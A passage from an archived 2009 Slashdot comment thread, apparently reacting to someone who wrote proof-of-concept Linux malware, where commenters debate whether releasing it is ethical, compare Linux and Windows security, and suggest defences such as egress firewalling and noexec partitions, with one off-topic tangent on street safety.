( Good luck on doing that while not releasing information to the general public )</tokentext>
<sentencetext>then show this code to whomever it will help actually fix those holes but try not to release it to the public at largeI'm sorry to bring up an argument that everyone has already heard (or work out on their own), but I think it warrants a saying (yet again):How about also releasing information about workarounds to the countless systems administrators who are in a position to deploy that workaround?
(Good luck on doing that while not releasing information to the general public)
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278654</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30307986</id>
	<title>To the guy who made this malware:</title>
	<author>Anonymous</author>
	<datestamp>1259609400000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>GO TO HELL!!!! If you release this malware, you will soon see truly malicious viruses for linux. Linux is more secure than windows, but not as much as some users like to think. If you release this or already did, may you be Bill's towel boy in hellfor eternity, and may Steve Ballmer shove a Pineapple up your @$$.</p></htmltext>
<tokenext>GO TO HELL ! ! ! !
If you release this malware , you will soon see truly malicious viruses for linux .
Linux is more secure than windows , but not as much as some users like to think .
If you release this or already did , may you be Bill 's towel boy in hellfor eternity , and may Steve Ballmer shove a Pineapple up your @ $ $ .</tokentext>
<sentencetext>GO TO HELL!!!!
If you release this malware, you will soon see truly malicious viruses for linux.
Linux is more secure than windows, but not as much as some users like to think.
If you release this or already did, may you be Bill's towel boy in hellfor eternity, and may Steve Ballmer shove a Pineapple up your @$$.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282576</id>
	<title>evil-hacking is like drug addiction</title>
	<author>Anonymous</author>
	<datestamp>1259679720000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I have a freind who is a chuckle-headed moron.  He used to be a drug addict.  And now, when he talks about the drugs, he actually describes, in detail, how he abused them so that anyone who hears him will know how to do it and thus become an adict even quicker.  And I tell him not to and he goes on with the description because he has a perverse side of his personality.  Publishing how to hack and do root kits to 'the world' is much the same.  People who do this are looking for approval and/or money.</p></htmltext>
<tokenext>I have a freind who is a chuckle-headed moron .
He used to be a drug addict .
And now , when he talks about the drugs , he actually describes , in detail , how he abused them so that anyone who hears him will know how to do it and thus become an adict even quicker .
And I tell him not to and he goes on with the description because he has a perverse side of his personality .
Publishing how to hack and do root kits to 'the world ' is much the same .
People who do this are looking for approval and/or money .</tokentext>
<sentencetext>I have a freind who is a chuckle-headed moron.
He used to be a drug addict.
And now, when he talks about the drugs, he actually describes, in detail, how he abused them so that anyone who hears him will know how to do it and thus become an adict even quicker.
And I tell him not to and he goes on with the description because he has a perverse side of his personality.
Publishing how to hack and do root kits to 'the world' is much the same.
People who do this are looking for approval and/or money.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279326</id>
	<title>Terminology</title>
	<author>MagickalMyst</author>
	<datestamp>1259602440000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext>Non-malicious malware.... Dudware?</htmltext>
<tokenext>Non-malicious malware.... Dudware ?</tokentext>
<sentencetext>Non-malicious malware.... Dudware?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280088</id>
	<title>Re:Insecurity through stupidity</title>
	<author>drinkypoo</author>
	<datestamp>1259610960000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Ubuntu Karmic requires a six character password. It does not however enforce any standards as to what characters you use, so username foo password foofoo is legal.</p></htmltext>
<tokenext>Ubuntu Karmic requires a six character password .
It does not however enforce any standards as to what characters you use , so username foo password foofoo is legal .</tokentext>
<sentencetext>Ubuntu Karmic requires a six character password.
It does not however enforce any standards as to what characters you use, so username foo password foofoo is legal.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278974</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280748</id>
	<title>Dear Guru</title>
	<author>Demonoid-Penguin</author>
	<datestamp>1259662020000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Your idea have both merit and originality. Unfortunately the bits that have merit are unoriginal, and the bits that have originality have no merit.
Good luck attempting to get n00b Ubuntu ('cause Debian is tooo hard) users to install your "malware" - given that so many of them think cli is some sort of "G" spot.
Is your exploit driven by the availability heuristic?? Leaving aside the chances of your exploits "wising up" the world (get down off the cross, we need the wood) I am reminded of the saying that the "empty mactchbox makes the most noise". Google gives "Results 1 - 10 of about 1,780 for "I was fed up with the general consensus that Linux is oh-so-secure and has no malware."
del./r&gt;null

PS. If you find you can't unlock your C:, try  "" as a password (without the quotes)</htmltext>
<tokenext>Your idea have both merit and originality .
Unfortunately the bits that have merit are unoriginal , and the bits that have originality have no merit .
Good luck attempting to get n00b Ubuntu ( 'cause Debian is tooo hard ) users to install your " malware " - given that so many of them think cli is some sort of " G " spot .
Is your exploit driven by the availability heuristic ? ?
Leaving aside the chances of your exploits " wising up " the world ( get down off the cross , we need the wood ) I am reminded of the saying that the " empty mactchbox makes the most noise " .
Google gives " Results 1 - 10 of about 1,780 for " I was fed up with the general consensus that Linux is oh-so-secure and has no malware .
" del./r &gt; null PS .
If you find you ca n't unlock your C : , try " " as a password ( without the quotes )</tokentext>
<sentencetext>Your idea have both merit and originality.
Unfortunately the bits that have merit are unoriginal, and the bits that have originality have no merit.
Good luck attempting to get n00b Ubuntu ('cause Debian is tooo hard) users to install your "malware" - given that so many of them think cli is some sort of "G" spot.
Is your exploit driven by the availability heuristic??
Leaving aside the chances of your exploits "wising up" the world (get down off the cross, we need the wood) I am reminded of the saying that the "empty mactchbox makes the most noise".
Google gives "Results 1 - 10 of about 1,780 for "I was fed up with the general consensus that Linux is oh-so-secure and has no malware.
"
del./r&gt;null

PS.
If you find you can't unlock your C:, try  "" as a password (without the quotes)</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30290412</id>
	<title>I was fed up with the general consensus that Linux</title>
	<author>Anonymous</author>
	<datestamp>1259668740000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>so I wrote some code and spread the s**t from the windows world to the other worlds just to point out that I in fact hate lunix people for being cool.</p></htmltext>
<tokenext>so I wrote some code and spread the s * * t from the windows world to the other worlds just to point out that I in fact hate lunix people for being cool .</tokentext>
<sentencetext>so I wrote some code and spread the s**t from the windows world to the other worlds just to point out that I in fact hate lunix people for being cool.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278624</id>
	<title>You've failed to understand the real world</title>
	<author>Anonymous</author>
	<datestamp>1259596080000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>Malware can exist for any platform.<br>However, real actual malware in the wild requires an eco-system to support it. Providing you can compromise a machine proves nothing. Proving that an ecosystem can actually exist on Linux machines would require completely releasing it into the wild, and subjecting innocent people to it.</p><p>I don't know about you, but I know where that falls when it comes to ethics and it ain't on the right side of it.</p></htmltext>
<tokenext>Malware can exist for any platform.However , real actual malware in the wild requires an eco-system to support it .
Providing you can compromise a machine proves nothing .
Proving that an ecosystem can actually exist on Linux machines would require completely releasing it into the wild , and subjecting innocent people to it.I do n't know about you , but I know where that falls when it comes to ethics and it ai n't on the right side of it .</tokentext>
<sentencetext>Malware can exist for any platform.However, real actual malware in the wild requires an eco-system to support it.
Providing you can compromise a machine proves nothing.
Proving that an ecosystem can actually exist on Linux machines would require completely releasing it into the wild, and subjecting innocent people to it.I don't know about you, but I know where that falls when it comes to ethics and it ain't on the right side of it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281304</id>
	<title>Is this a joke?</title>
	<author>AlgorithMan</author>
	<datestamp>1259667780000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>so you can write malware for linux - no big deal - connecting to IRC and waiting for instructions like DDOS'ing some server and sending mails, shure that's possible. The reason why linux is so secure is not that malware was magically "impossible" (which would contradict Rice's Theorem btw)<br> <br>

if you have access to a machine, then OF COURSE you can install malicious binaries, only an idiot would claim the opposite! GETTING that access is the problem! and default-users don't have access to system directories, so they can only infect their own account (plus: since binaries by default don't get the execute-bit, it's quite hard to make someone execute your binary by accident e.g. by making it look like a word-document or a video or something... you have to get him to chmod +x your binary, and THAT is no accident anymore)</htmltext>
<tokenext>so you can write malware for linux - no big deal - connecting to IRC and waiting for instructions like DDOS'ing some server and sending mails , shure that 's possible .
The reason why linux is so secure is not that malware was magically " impossible " ( which would contradict Rice 's Theorem btw ) if you have access to a machine , then OF COURSE you can install malicious binaries , only an idiot would claim the opposite !
GETTING that access is the problem !
and default-users do n't have access to system directories , so they can only infect their own account ( plus : since binaries by default do n't get the execute-bit , it 's quite hard to make someone execute your binary by accident e.g .
by making it look like a word-document or a video or something... you have to get him to chmod + x your binary , and THAT is no accident anymore )</tokentext>
<sentencetext>so you can write malware for linux - no big deal - connecting to IRC and waiting for instructions like DDOS'ing some server and sending mails, shure that's possible.
The reason why linux is so secure is not that malware was magically "impossible" (which would contradict Rice's Theorem btw) 

if you have access to a machine, then OF COURSE you can install malicious binaries, only an idiot would claim the opposite!
GETTING that access is the problem!
and default-users don't have access to system directories, so they can only infect their own account (plus: since binaries by default don't get the execute-bit, it's quite hard to make someone execute your binary by accident e.g.
by making it look like a word-document or a video or something... you have to get him to chmod +x your binary, and THAT is no accident anymore)</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279018</id>
	<title>Go ahead and do release it</title>
	<author>Anonymous</author>
	<datestamp>1259599200000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>as long as it's licensed under a proper Free Software license. Who gives a fuck.</p><p>With so many new Ubuntu users, Linux is already windoze in the security sense.</p></htmltext>
<tokenext>as long as it 's licensed under a proper Free Software license .
Who gives a fuck.With so many new Ubuntu users , Linux is already windoze in the security sense .</tokentext>
<sentencetext>as long as it's licensed under a proper Free Software license.
Who gives a fuck.With so many new Ubuntu users, Linux is already windoze in the security sense.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283560</id>
	<title>Opening this thread made WinXP crash</title>
	<author>rwa2</author>
	<datestamp>1259684580000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Ha, Firefox and Explorer stopped responding the first time I opened this thread, so I'm getting a kick, etc.</p><p>Anyway, thanks for reminding me that I need to invest in a bunch of RAM for my home server so I can move most of the services into VMs<nobr> <wbr></nobr>:P</p></htmltext>
<tokenext>Ha , Firefox and Explorer stopped responding the first time I opened this thread , so I 'm getting a kick , etc.Anyway , thanks for reminding me that I need to invest in a bunch of RAM for my home server so I can move most of the services into VMs : P</tokentext>
<sentencetext>Ha, Firefox and Explorer stopped responding the first time I opened this thread, so I'm getting a kick, etc.Anyway, thanks for reminding me that I need to invest in a bunch of RAM for my home server so I can move most of the services into VMs :P</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30297282</id>
	<title>No big deal</title>
	<author>ebvwfbw</author>
	<datestamp>1259596620000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Yea, sure you may be able to get a user or two.  Maybe.  Even then just boot of of CD, fix it and your owning the system is a thing of the past. I'd have the machine back in business in at most an hour.  Own me on Windows and I'm screwed.  Which one of the hundreds of thousands registry items did you change/add/delete?  Which Fu*** windows CD goes to this machine?  If I reinstall I have to reinstall ALL of the software packages I had, deal with getting windows re-registered AGAIN, the package X AGAIN, package Y AGAIN and they think you are pirating their software.  Then there are things like the partition program purchased online, Codecs purchased online... good luck with that.  Last time my windows box was compromised by my Daughter visiting a site, it took me a month to get it back. A MONTH!  Every data file had to be verified, it was a major PIA.  With windows I can be owned by simply visiting a web site, leaving outlook open, blowing on it it seems.  Linux/Unix has real security.  I also have things backed up multiple times.  If someone calls me to help fix their windows machine, it's a major undertaking.<p>
So go ahead, release the code, I'm not worried.  He might even infect 100 machines!  Woop de do.  If I put the same effort into a windows virus, I could probably own millions in just a matter of days.  I don't need a proof of concept, there are plenty of real world examples. Most machines STILL run as admin in the windows world.</p></htmltext>
<tokenext>Yea , sure you may be able to get a user or two .
Maybe. Even then just boot of of CD , fix it and your owning the system is a thing of the past .
I 'd have the machine back in business in at most an hour .
Own me on Windows and I 'm screwed .
Which one of the hundreds of thousands registry items did you change/add/delete ?
Which Fu * * * windows CD goes to this machine ?
If I reinstall I have to reinstall ALL of the software packages I had , deal with getting windows re-registered AGAIN , the package X AGAIN , package Y AGAIN and they think you are pirating their software .
Then there are things like the partition program purchased online , Codecs purchased online... good luck with that .
Last time my windows box was compromised by my Daughter visiting a site , it took me a month to get it back .
A MONTH !
Every data file had to be verified , it was a major PIA .
With windows I can be owned by simply visiting a web site , leaving outlook open , blowing on it it seems .
Linux/Unix has real security .
I also have things backed up multiple times .
If someone calls me to help fix their windows machine , it 's a major undertaking .
So go ahead , release the code , I 'm not worried .
He might even infect 100 machines !
Woop de do .
If I put the same effort into a windows virus , I could probably own millions in just a matter of days .
I do n't need a proof of concept , there are plenty of real world examples .
Most machines STILL run as admin in the windows world .</tokentext>
<sentencetext>Yea, sure you may be able to get a user or two.
Maybe.  Even then just boot of of CD, fix it and your owning the system is a thing of the past.
I'd have the machine back in business in at most an hour.
Own me on Windows and I'm screwed.
Which one of the hundreds of thousands registry items did you change/add/delete?
Which Fu*** windows CD goes to this machine?
If I reinstall I have to reinstall ALL of the software packages I had, deal with getting windows re-registered AGAIN, the package X AGAIN, package Y AGAIN and they think you are pirating their software.
Then there are things like the partition program purchased online, Codecs purchased online... good luck with that.
Last time my windows box was compromised by my Daughter visiting a site, it took me a month to get it back.
A MONTH!
Every data file had to be verified, it was a major PIA.
With windows I can be owned by simply visiting a web site, leaving outlook open, blowing on it it seems.
Linux/Unix has real security.
I also have things backed up multiple times.
If someone calls me to help fix their windows machine, it's a major undertaking.
So go ahead, release the code, I'm not worried.
He might even infect 100 machines!
Woop de do.
If I put the same effort into a windows virus, I could probably own millions in just a matter of days.
I don't need a proof of concept, there are plenty of real world examples.
Most machines STILL run as admin in the windows world.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278812</id>
	<title>Re:Show it only to while hat hackers</title>
	<author>GrantRobertson</author>
	<datestamp>1259597580000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Agreed. The OP should get a lawyer and come up with a non-disclosure, non-compete agreement that says that signers can use the code as a target to design against but that they are specifically disallowed from distributing it or any derivative work. I know, it is the opposite of FOSS and Richard Stallman would kick my ass for saying it. However, as long as you give free access to responsible people who want to see it if they sign the agreement, I don't think there is any ethical problem. Heck, he could even make a little money off of it by selling the information as a white-paper just like any other professional consulting firm.</htmltext>
<tokenext>Agreed .
The OP should get a lawyer and come up with a non-disclosure , non-compete agreement that says that signers can use the code as a target to design against but that they are specifically disallowed from distributing it or any derivative work .
I know , it is the opposite of FOSS and Richard Stallman would kick my ass for saying it .
However , as long as you give free access to responsible people who want to see it if they sign the agreement , I do n't think there is any ethical problem .
Heck , he could even make a little money off of it by selling the information as a white-paper just like any other professional consulting firm .</tokentext>
<sentencetext>Agreed.
The OP should get a lawyer and come up with a non-disclosure, non-compete agreement that says that signers can use the code as a target to design against but that they are specifically disallowed from distributing it or any derivative work.
I know, it is the opposite of FOSS and Richard Stallman would kick my ass for saying it.
However, as long as you give free access to responsible people who want to see it if they sign the agreement, I don't think there is any ethical problem.
Heck, he could even make a little money off of it by selling the information as a white-paper just like any other professional consulting firm.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278708</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281328</id>
	<title>Re:Dear Slashdot</title>
	<author>js\_sebastian</author>
	<datestamp>1259668200000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>People do NOT walk around the world indiscriminately. They avoid bad neighborhoods (...)</p></div><p>In the US, they do. Here in Europe mostly you can walk where the fuck you want. In none of the cities I have lived in in Europe throughout my life (and that includes some large ones), has there been a neighborhood where I was afraid to walk at night.</p></div>
	</htmltext>
<tokenext>People do NOT walk around the world indiscriminately .
They avoid bad neighborhoods ( ... ) In the US , they do .
Here in Europe mostly you can walk where the fuck you want .
In none of the cities I have lived in in Europe throughout my life ( and that includes some large ones ) , has there been a neighborhood where I was afraid to walk at night .</tokentext>
<sentencetext>People do NOT walk around the world indiscriminately.
They avoid bad neighborhoods (...)In the US, they do.
Here in Europe mostly you can walk where the fuck you want.
In none of the cities I have lived in in Europe throughout my life (and that includes some large ones), has there been a neighborhood where I was afraid to walk at night.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279146</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280640</id>
	<title>Don't let a server call home!</title>
	<author>Scotch42</author>
	<datestamp>1259661060000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext><p>Why should a (web)server be allowed to issue any request ? It should be configured to answer queries only, no ? iptables is great and easy to set up for that task. Even for software update, one may push the package needed to the target server in place of the usual pull from the target; so no exceptions are needed on the firewall.</p><p>For desktops it's a little bit more complicated... but using a home partition mounted with noexec should suffice. Installing a new software is not a casual issue but a real event and should be taken care of by someone knowing what he's doing. That's why root was invented, isn't it ?</p></htmltext>
<tokenext>Why should a ( web ) server be allowed to issue any request ?
It should be configured to answer queries only , no ?
iptables is great and easy to set up for that task .
Even for software update , one may push the package needed to the target server in place of the usual pull from the target ; so no exceptions are needed on the firewall.For desktops it 's a little bit more complicated... but using a home partition mounted with noexec should suffice .
Installing a new software is not a casual issue but a real event and should be taken care of by someone knowing what he 's doing .
That 's why root was invented , is n't it ?</tokentext>
<sentencetext>Why should a (web)server be allowed to issue any request ?
It should be configured to answer queries only, no ?
iptables is great and easy to set up for that task.
Even for software update, one may push the package needed to the target server in place of the usual pull from the target; so no exceptions are needed on the firewall.For desktops it's a little bit more complicated... but using a home partition mounted with noexec should suffice.
Installing a new software is not a casual issue but a real event and should be taken care of by someone knowing what he's doing.
That's why root was invented, isn't it ?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30328714</id>
	<title>Refactor it?</title>
	<author>Anonymous</author>
	<datestamp>1259920440000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Perhaps you could refactor it as an analysis tool? It could still be malware-ish, inserting itself into cron and wherever, but regularly checking for the original openings, and suggesting ways to close the gaps.</p></htmltext>
<tokenext>Perhaps you could refactor it as an analysis tool ?
It could still be malware-ish , inserting itself into cron and wherever , but regularly checking for the original openings , and suggesting ways to close the gaps .</tokentext>
<sentencetext>Perhaps you could refactor it as an analysis tool?
It could still be malware-ish, inserting itself into cron and wherever, but regularly checking for the original openings, and suggesting ways to close the gaps.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278996</id>
	<title>Re:Commendable</title>
	<author>cbiltcliffe</author>
	<datestamp>1259599020000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>2</modscore>
	<htmltext><p>That doesn't make Linux less secure than Windows.  That makes the user just as insecure as the same uneducated fool running Windows.</p><p>1) Newbie Windows users who are having problems with their systems will pretty much click on anything as any user you tell them to in a desparate hope to get IE working again.</p><p>2) Windows settings dialogs on their own can look very cryptic to the uninitiated.  Add into that the scripting abilities of cmd.exe... HAHAHA<nobr> <wbr></nobr>...ok.. I can't complete that thought without falling out of my chair.  But, a new Windows users won't be able to differentiate a malicious click from one that will get their Freecell working again.</p><p>3) The out-of-the-box remote admin abilities of Windows are excellent. (At least...as good as they are for Linux.  Considering that both have a firewall by default, which you have to get the user to turn off in order to be able to remote admin the box...)</p><p>4) Standard tools like BackOrifice can easily be used to establish out-connecting remote management sessions.</p><p>5) OR, you can just get them to IE download and click your favourite piece of malware.</p><p>See?  It's not Linux.  It's the user.<br>Every security problem you mentioned applies equally to every operating system on the planet.  Except the odd few that don't have networking abilities.....</p></htmltext>
<tokenext>That does n't make Linux less secure than Windows .
That makes the user just as insecure as the same uneducated fool running Windows.1 ) Newbie Windows users who are having problems with their systems will pretty much click on anything as any user you tell them to in a desparate hope to get IE working again.2 ) Windows settings dialogs on their own can look very cryptic to the uninitiated .
Add into that the scripting abilities of cmd.exe... HAHAHA ...ok.. I ca n't complete that thought without falling out of my chair .
But , a new Windows users wo n't be able to differentiate a malicious click from one that will get their Freecell working again.3 ) The out-of-the-box remote admin abilities of Windows are excellent .
( At least...as good as they are for Linux .
Considering that both have a firewall by default , which you have to get the user to turn off in order to be able to remote admin the box... ) 4 ) Standard tools like BackOrifice can easily be used to establish out-connecting remote management sessions.5 ) OR , you can just get them to IE download and click your favourite piece of malware.See ?
It 's not Linux .
It 's the user.Every security problem you mentioned applies equally to every operating system on the planet .
Except the odd few that do n't have networking abilities.... .</tokentext>
<sentencetext>That doesn't make Linux less secure than Windows.
That makes the user just as insecure as the same uneducated fool running Windows.1) Newbie Windows users who are having problems with their systems will pretty much click on anything as any user you tell them to in a desparate hope to get IE working again.2) Windows settings dialogs on their own can look very cryptic to the uninitiated.
Add into that the scripting abilities of cmd.exe... HAHAHA ...ok.. I can't complete that thought without falling out of my chair.
But, a new Windows users won't be able to differentiate a malicious click from one that will get their Freecell working again.3) The out-of-the-box remote admin abilities of Windows are excellent.
(At least...as good as they are for Linux.
Considering that both have a firewall by default, which you have to get the user to turn off in order to be able to remote admin the box...)4) Standard tools like BackOrifice can easily be used to establish out-connecting remote management sessions.5) OR, you can just get them to IE download and click your favourite piece of malware.See?
It's not Linux.
It's the user.Every security problem you mentioned applies equally to every operating system on the planet.
Except the odd few that don't have networking abilities.....</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279028</id>
	<title>Re:Dear Slashdot</title>
	<author>buchner.johannes</author>
	<datestamp>1259599260000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>2</modscore>
	<htmltext><p>An excellent analogy. Both insightful and funny. I like it.</p><p>However: This does not do any harm, neither physically nor virtually. In your analogy, it would be releasing the technique of touching someones nose, so everyone can do it. Everyone can alter it to a punch in the face, and they can apply it. I guess it boils down to 'The Physicists - Friedrich D&#252;rrenmatt': Is a developer responsible for the users that apply the product, or is each user responsible himself for how they apply? With the A-bomb and TNT, there are real lives at stake; but with software there aren't.</p></htmltext>
<tokenext>An excellent analogy .
Both insightful and funny .
I like it.However : This does not do any harm , neither physically nor virtually .
In your analogy , it would be releasing the technique of touching someones nose , so everyone can do it .
Everyone can alter it to a punch in the face , and they can apply it .
I guess it boils down to 'The Physicists - Friedrich D   rrenmatt ' : Is a developer responsible for the users that apply the product , or is each user responsible himself for how they apply ?
With the A-bomb and TNT , there are real lives at stake ; but with software there are n't .</tokentext>
<sentencetext>An excellent analogy.
Both insightful and funny.
I like it.However: This does not do any harm, neither physically nor virtually.
In your analogy, it would be releasing the technique of touching someones nose, so everyone can do it.
Everyone can alter it to a punch in the face, and they can apply it.
I guess it boils down to 'The Physicists - Friedrich Dürrenmatt': Is a developer responsible for the users that apply the product, or is each user responsible himself for how they apply?
With the A-bomb and TNT, there are real lives at stake; but with software there aren't.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279544</id>
	<title>Why does my</title>
	<author>kutulu13</author>
	<datestamp>1259604360000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Why does my process list show BOINC?</p></htmltext>
<tokenext>Why does my process list show BOINC ?</tokentext>
<sentencetext>Why does my process list show BOINC?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280400</id>
	<title>Re:Dear Slashdot</title>
	<author>Anonymous</author>
	<datestamp>1259658000000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p>Ever heard "Don't look at anybody on the subway/bus/EL/whatever"? It's because people acknowledge that there are mouthbreathing retards that will fuck you up because you looked at them funny or because they like your briefcase.</p></div><p>
Actually it's usually better to glance at everyone, but not stare.
<br> <br>
Making eye contact for a split second with a neutral expression (as one would when casually looking around) makes both parties aware of each others' presence and partial identity (e.g. what they look like). Someone with malicious intent is much less likely to target you if they're aware that you've seen and mentally recorded their face... Unless the person is crazy and is looking for any excuse for a fight, in which case any action you take may be cause for them to target you anyways.
<br> <br>
On the street, you don't "keep your head down" -- you make brief but non-confrontational eye contact and register their appearance. You always walk with unencumbered hands, with a makeshift weapon in close reach if necessary (e.g. keys stuck through your fingers while making a fist); you never use anything that disables your senses (e.g. headphones) or shows wealth (e.g. white iPod headphones, texting on your phone); you pay attention to your environment, including what's behind you (long shadows cast by streetlights are very useful for seeing movement behind you); and you NEVER let anyone come into your personal space, even if that means crossing the street ahead of time (you did notice them while they were still far away, right?). When coming up to a corner, an entrance, or any place where someone could hide and jump out at you, you maintain enough of a distance so you can see what's there and react. You also pay attention to vehicles on both sides of the street, both parked and moving; if a parked car has people in it, stay away and be aware; if a moving car pulls up, keep your distance and be ready to bolt.
<br> <br>
The main point: be aware, and if anyone gets too close, you get the fuck away from them as fast as you can. Who cares if you look like an idiot? You don't mess around with these things.
<br> <br>
Securing your life is worth a little extra work in certain situations, and it's certainly worth far more than what's in your pockets. If you're trapped and they just want money, give it up easy (try to distract them by throwing it on the ground and running away, if you can do so without being shot).  If you're trapped and they're just looking to fight someone, don't let them get the first hit -- try to temporarily disable them and get the hell out of there as fast as possible.
<br> <br>
This may sound overly paranoid and it may seem like you'll spend your time outside worrying about every detail, but really it's just common sense and becomes automatic after a while (i.e. takes minimal effort after it becomes habit). If you use such common sense, you'll find you're actually much less afraid of being out alone in bad areas than if you are completely unprepared for the unexpected.
<br> <br>
I'm a white male living right near several projects in the south side of Chicago, in an area where pedestrians are often mugged and attacked, and I've never had any problems walking around at any hour of the night.</p></div>
	</htmltext>
<tokenext>Ever heard " Do n't look at anybody on the subway/bus/EL/whatever " ?
It 's because people acknowledge that there are mouthbreathing retards that will fuck you up because you looked at them funny or because they like your briefcase .
Actually it 's usually better to glance at everyone , but not stare .
Making eye contact for a split second with a neutral expression ( as one would when casually looking around ) makes both parties aware of each others ' presence and partial identity ( e.g .
what they look like ) .
Someone with malicious intent is much less likely to target you if they 're aware that you 've seen and mentally recorded their face... Unless the person is crazy and is looking for any excuse for a fight , in which case any action you take may be cause for them to target you anyways .
On the street , you do n't " keep your head down " -- you make brief but non-confrontational eye contact and register their appearance .
You always walk with unencumbered hands , with a makeshift weapon in close reach if necessary ( e.g .
keys stuck through your fingers while making a fist ) ; you never use anything that disables your senses ( e.g .
headphones ) or shows wealth ( e.g .
white iPod headphones , texting on your phone ) ; you pay attention to your environment , including what 's behind you ( long shadows cast by streetlights are very useful for seeing movement behind you ) ; and you NEVER let anyone come into your personal space , even if that means crossing the street ahead of time ( you did notice them while they were still far away , right ? ) .
When coming up to a corner , an entrance , or any place where someone could hide and jump out at you , you maintain enough of a distance so you can see what 's there and react .
You also pay attention to vehicles on both sides of the street , both parked and moving ; if a parked car has people in it , stay away and be aware ; if a moving car pulls up , keep your distance and be ready to bolt .
The main point : be aware , and if anyone gets too close , you get the fuck away from them as fast as you can .
Who cares if you look like an idiot ?
You do n't mess around with these things .
Securing your life is worth a little extra work in certain situations , and it 's certainly worth far more than what 's in your pockets .
If you 're trapped and they just want money , give it up easy ( try to distract them by throwing it on the ground and running away , if you can do so without being shot ) .
If you 're trapped and they 're just looking to fight someone , do n't let them get the first hit -- try to temporarily disable them and get the hell out of there as fast as possible .
This may sound overly paranoid and it may seem like you 'll spend your time outside worrying about every detail , but really it 's just common sense and becomes automatic after a while ( i.e .
takes minimal effort after it becomes habit ) .
If you use such common sense , you 'll find you 're actually much less afraid of being out alone in bad areas than if you are completely unprepared for the unexpected .
I 'm a white male living right near several projects in the south side of Chicago , in an area where pedestrians are often mugged and attacked , and I 've never had any problems walking around at any hour of the night .</tokentext>
<sentencetext>Ever heard "Don't look at anybody on the subway/bus/EL/whatever"?
It's because people acknowledge that there are mouthbreathing retards that will fuck you up because you looked at them funny or because they like your briefcase.
Actually it's usually better to glance at everyone, but not stare.
Making eye contact for a split second with a neutral expression (as one would when casually looking around) makes both parties aware of each others' presence and partial identity (e.g.
what they look like).
Someone with malicious intent is much less likely to target you if they're aware that you've seen and mentally recorded their face... Unless the person is crazy and is looking for any excuse for a fight, in which case any action you take may be cause for them to target you anyways.
On the street, you don't "keep your head down" -- you make brief but non-confrontational eye contact and register their appearance.
